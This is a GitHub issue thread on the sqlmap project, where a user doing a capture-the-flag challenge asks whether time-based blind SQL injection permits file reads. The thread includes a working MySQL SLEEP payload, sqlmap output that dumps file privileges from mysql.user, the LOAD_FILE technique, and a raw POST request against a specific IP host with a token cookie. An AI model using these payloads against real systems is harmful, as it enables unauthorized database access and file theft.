### ISSUE TITLE
Is reading or writing a file depends on the technique that has been found by sqlmap

### ISSUE THREAD

**Issue by jedai47** [sqlmapproject/sqlmap#5204]
**Describe the bug**
I would like to know if for exemple, sqlmap found a time-based blind sqli does that mean it wont be able to read or write to back-end OS, or is this irrelevant of the type of injection ?

**Comment by stamparm** [comment]
short answer: yes
long answer: (e.g.) in case of MySQL read file, if "stacking" is available (i.e. stacked time-based SQLi is detected), two step workflow will be used, where in one step file will be stored into a temporary file and loaded into a temporary table on remote (usually two requests are required), while in second step, any technique (from fastest to slowest) will be used for retrieval of the content of that same temporary table. In case that "stacking" is not available, same query will be used across all techniques (i.e. `HEX(LOAD_FILE(...)`)

p.s. most problematic part in file access are actually the OS permissions. if you are the `admin` on database, that doesn't mean that your DBMS (e.g. MySQL) will have filesystem access to arbitrary locations

**Comment by jedai47** [comment]
Thanks for the answer, I'm actually asking the question due to a ctf challenge I am doing. And I checked with --sql-shell, that my user has indeed, file privileges:
```bash
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: number=' AND (SELECT 4597 FROM (SELECT(SLEEP(5)))vFal) AND 'ajWK'='ajWK
---
[13:18:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[13:18:30] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select user,file_priv from mysql.user where file_priv="Y";
[13:18:33] [INFO] fetching SQL SELECT statement query output: 'select user,file_priv from mysql.user where file_priv="Y"'
[13:18:33] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[13:18:33] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                       
[13:18:34] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
[13:18:50] [INFO] adjusting time delay to 1 second due to good response times
3
the SQL query provided can return 3 entries. How many entries do you want to retrieve?
[a] All (default)
[#] Specific number
[q] Quit
> a
[13:18:57] [INFO] retrieved: casino
[13:19:32] [INFO] retrieved: Y
[13:19:36] [INFO] retrieved: debian-sys-maint
[13:20:32] [INFO] retrieved: Y
[13:20:35] [INFO] retrieved: root
[13:20:52] [INFO] retrieved: Y
select user,file_priv from mysql.user where file_priv="Y" [3]:
[*] casino, Y
[*] debian-sys-maint, Y
[*] root, Y
```


 As per, your concerne of OS permissions, I would believe that (in that challenge OS is Linux) some files are world readable (ie /etc/passwd, /etc/papersize etc..) or at least some files that are related to mysql functionning.

I would really appreciate if you would check that out to see if that issue is related to sqlmap or something else : (here is the sql file )
```bash
POST /playground/wheel_game/dist/win.php HTTP/1.1
Host: 54.38.35.90:81
Content-Length: 8
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://54.38.35.90:81
Referer: http://54.38.35.90:81/playground/wheel_game/dist/wheel.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6IkRlYWxlciIsImJhbGFuY2UiOjY1OCwiaWQiOjl9.kT8DRcp6F_UuGsHfKbhR3kT6tNHmWJIYjKMHMcQ1BcU
Connection: close

number=*
```

**Comment by stamparm** [comment]
yea. not sure whether you've read that last part, so I am going to just copy-paste it:
`p.s. most problematic part in file access are actually the OS permissions. if you are the admin on database, that doesn't mean that your DBMS (e.g. MySQL) will have filesystem access to arbitrary locations`

OS permissions have nothing to do with admin or `file_priv` fancy flags

please read carefully the next article: https://computingforgeeks.com/how-to-solve-mysql-server-is-running-with-the-secure-file-priv-error/

if that doesn't help, then please try to load mysql client (i.e. `mysql`) and actually try to load arbitrary files around to get your answer
